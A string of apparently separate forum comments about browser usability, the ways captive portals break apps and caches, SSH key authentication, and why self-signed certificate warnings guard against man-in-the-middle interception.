I suppose people don't want easier browsers because they imagine they are easy enough and can't imagine something better. At least I hope that's the reason, and not that they fear change, or are indifferent to the needs of people other than themselves and prefer to design for that alone.
There's no way in hell I'm crazy enough to make a browser, though. I'd rather run for elected office, or eat an entire Volkswagen Golf.
Were you writing a forum post? It was lost because it got submitted to the captive portal. Were you in a dynamic app? It crashed because it got HTML instead of JSON. Does your page reload ads in the iframes? Your page position, and the page itself, are now lost, and you are on the captive portal page. Did you have a native app that did HTTP requests and cached them? Congrats, you have invalid data in your cache now.
And I have seen captive portals that were broken. How about getting redirected to the login page every time you go to your favorite website, because the redirect page got cached somehow?
Good riddance. Yes, browsers should include better captive portal support like Android does, possibly triggered by SSL certificate mismatch errors, but even the current situation, where I have to type "aaa.com" by hand all the time, is great.
While for TLS, client certificates are unfortunately not a solution against MITM due to their awful user experience and privacy concerns, for SSH, public key authentication has a good user experience and is very common.
The scary warnings for self-signed certificates are in fact a protection against MITM. It's because of them that MITM proxies are forced to install a CA certificate. The main difference is that installing a CA certificate requires explicit action in the browser (and on some newer systems displays scary warnings), while if a MITM proxy could simply present a fake self-signed certificate, it could easily intercept anyone. Therefore, self-signed certificates are strictly worse.